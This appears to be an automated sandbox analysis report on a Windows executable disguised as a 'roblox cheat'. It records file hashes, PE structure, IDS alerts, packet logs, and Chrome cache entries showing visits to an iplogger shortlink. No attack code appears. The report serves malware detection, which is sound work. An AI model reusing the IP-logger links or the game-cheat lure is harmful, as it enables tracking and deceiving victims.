                                                                                Preview:L..................F.@.. ...$+.,....R.$M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2679
                                                                                Entropy (8bit):3.9958391477129274
                                                                                Encrypted:false
                                                                                SSDEEP:48:8pdKTAPHoidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbBy+yT+:8+8PTcJTbxWOvTbBy7T
                                                                                MD5:380902163E2D080D4365D17CC3FD2D7E
                                                                                SHA1:4F9F9D1AD31B2209615B67B16F701F9317665FD1
                                                                                SHA-256:D7689AF49252D34FE476162A8B5B5DF634EB45F2669A4DED03A3B3E342578E76
                                                                                SHA-512:2F8908760B077556B945DF918CE1545B102002329F600E92A78D96323442FA918948B1F2D04C4B73BAB829393954EE62569788BF5F692C4E67049CB78D52CA84
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,....c9.M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                Chrome Cache Entry: 134

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                Category:dropped
                                                                                Size (bytes):445
                                                                                Entropy (8bit):7.051559084988302
                                                                                Encrypted:false
                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                Malicious:false
                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                                Chrome Cache Entry: 135

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):2833
                                                                                Entropy (8bit):7.876846206921263
                                                                                Encrypted:false
                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                Malicious:false
                                                                                URL:https://cdn.iplogger.org/favicon.ico
                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                Chrome Cache Entry: 136

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):2833
                                                                                Entropy (8bit):7.876846206921263
                                                                                Encrypted:false
                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                Chrome Cache Entry: 137

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):9909
                                                                                Entropy (8bit):5.400635618832281
                                                                                Encrypted:false
                                                                                SSDEEP:192:DLlw+00cv13xV1cSHYu+zogD2IIhWp6psOsW4rqSxVEGF5R2WxSi1yz:D5w+Pcv13T1FH0f6IIm6QXxFP20u
                                                                                MD5:DA7F46B6C4BFB6F73BFBEE944F4A9B73
                                                                                SHA1:165FFC72B4F69AD1184C09F23C9F71A562D41C11
                                                                                SHA-256:A53D8855089EA2072D45179F32880E3DBAF6BD6385BAAFAFADBBCC4B26B937EA
                                                                                SHA-512:7D0E7EAB00851F7E53F66BABE554F88346BBACD2DE32020C6BF3C6849C0F7026C1C552199040F2B9C8EDB89775D29AC9766A4A066C004C063358EC23FE36D863
                                                                                Malicious:false
                                                                                URL:https://2no.co/24RXx6
                                                                                Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"

                                                                                Chrome Cache Entry: 138

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                Category:downloaded
                                                                                Size (bytes):445
                                                                                Entropy (8bit):7.051559084988302
                                                                                Encrypted:false
                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                Malicious:false
                                                                                URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682
                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):6.461330913623725
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.64%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • InstallShield setup (43055/19) 0.21%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                File name:roblox cheat.exe
                                                                                File size:6'410'752 bytes
                                                                                MD5:6b94734feac8edb9f925385163ad59c9
                                                                                SHA1:3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
                                                                                SHA256:62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
                                                                                SHA512:ac51fd23bf17d0f6d4b4fac338d80dd50c4228e45472370b8806e0c1b00504f6c45978ccab134e3e0531d212e4c0d0222e1661c8c07c88bf1d1482047efa6ed5
                                                                                SSDEEP:98304:d7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuqbqw/:p0cB3djgmggDaRXAtHtqw/
                                                                                TLSH:A356CE12F940C071E5D240B296BEAF76897DAD300B3898D777C41D694A316E37A3AF27
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................`...........a.. ... a...@.. .......................@b...........`................................

                                                                                File Icon

                                                                                Icon Hash:66e2a0a0b0aa92b6

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0xa11b1e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x66A81403 [Mon Jul 29 22:13:23 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x611acc0x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6140000xcc88.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6220000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x6120000x1c.sdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x60fb240x60fc00935fc6ce3cd3ebf8fbc30adc805334f8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .sdata0x6120000x1380x2002b09539ff4c51eb230bd835080b63517False0.279296875data2.11838246956095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x6140000xcc880xce000be98fb8efcbbfdb03fefe23184dff85False0.17957372572815533data4.313831842937731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x6220000xc0x2003c75d8bdac0c06768297755f0689be06False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "a"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x6144c80xeebPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8866195339094004
                                                                                RT_ICON0x6153b80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.061230514879546526
                                                                                RT_ICON0x6195e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.09139004149377593
                                                                                RT_ICON0x61bb880x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 00.11553254437869823
                                                                                RT_ICON0x61d5f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.1376641651031895
                                                                                RT_ICON0x61e6980x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.1918032786885246
                                                                                RT_ICON0x61f0200x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 00.2779069767441861
                                                                                RT_ICON0x61f6d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.30939716312056736
                                                                                RT_GROUP_ICON0x61fb400x76data0.7457627118644068
                                                                                RT_VERSION0x6142800x244data0.46551724137931033
                                                                                RT_MANIFEST0x61fbb80x10d0XML 1.0 document, Unicode text, UTF-8 (with BOM) text0.40892193308550184

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                2024-07-30T00:54:42.469428+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971220.114.59.183192.168.2.9
                                                                                2024-07-30T00:55:19.729239+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436076420.12.23.50192.168.2.9

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 30, 2024 00:54:18.425143957 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:18.737216949 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:19.346632004 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:19.362289906 CEST49673443192.168.2.9204.79.197.203
                                                                                Jul 30, 2024 00:54:20.549835920 CEST49676443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:20.553518057 CEST49675443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:20.553522110 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:20.799818993 CEST49674443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:22.956022024 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:26.258094072 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:26.258135080 CEST44349708128.116.21.3192.168.2.9
                                                                                Jul 30, 2024 00:54:26.258205891 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:26.259303093 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:26.259316921 CEST44349708128.116.21.3192.168.2.9
                                                                                Jul 30, 2024 00:54:26.991041899 CEST44349708128.116.21.3192.168.2.9
                                                                                Jul 30, 2024 00:54:27.020034075 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:27.020046949 CEST44349708128.116.21.3192.168.2.9
                                                                                Jul 30, 2024 00:54:27.021752119 CEST44349708128.116.21.3192.168.2.9
                                                                                Jul 30, 2024 00:54:27.021819115 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:27.038989067 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:27.039130926 CEST49708443192.168.2.9128.116.21.3
                                                                                Jul 30, 2024 00:54:27.645862103 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:27.645909071 CEST4434971118.239.18.85192.168.2.9
                                                                                Jul 30, 2024 00:54:27.646040916 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:27.647360086 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:27.647380114 CEST4434971118.239.18.85192.168.2.9
                                                                                Jul 30, 2024 00:54:27.768436909 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:28.375315905 CEST4434971118.239.18.85192.168.2.9
                                                                                Jul 30, 2024 00:54:28.375865936 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:28.375876904 CEST4434971118.239.18.85192.168.2.9
                                                                                Jul 30, 2024 00:54:28.377136946 CEST4434971118.239.18.85192.168.2.9
                                                                                Jul 30, 2024 00:54:28.377219915 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:28.378432035 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:28.378607988 CEST4434971118.239.18.85192.168.2.9
                                                                                Jul 30, 2024 00:54:28.378665924 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:28.386760950 CEST49711443192.168.2.918.239.18.85
                                                                                Jul 30, 2024 00:54:28.964431047 CEST49673443192.168.2.9204.79.197.203
                                                                                Jul 30, 2024 00:54:30.161459923 CEST49676443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:30.161780119 CEST49675443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:30.401547909 CEST49674443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:32.190599918 CEST4434970423.206.229.209192.168.2.9
                                                                                Jul 30, 2024 00:54:32.190746069 CEST49704443192.168.2.923.206.229.209
                                                                                Jul 30, 2024 00:54:37.377531052 CEST49677443192.168.2.920.189.173.11
                                                                                Jul 30, 2024 00:54:41.145207882 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:41.145262003 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:41.145318985 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:41.162591934 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:41.162626028 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:41.995184898 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:41.995264053 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.038912058 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:42.038959026 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:42.039064884 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:42.085443974 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:42.085467100 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:42.115699053 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.115729094 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.116379976 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.160501957 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.195847034 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.240500927 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466484070 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466506004 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466515064 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466526985 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466563940 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.466567993 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466586113 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.466600895 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.466607094 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.466631889 CEST49712443192.168.2.920.114.59.183
                                                                                Jul 30, 2024 00:54:42.469263077 CEST4434971220.114.59.183192.168.2.9
                                                                                Jul 30, 2024 00:54:42.469310045 CEST49712443192.168.2.920.114.59.183
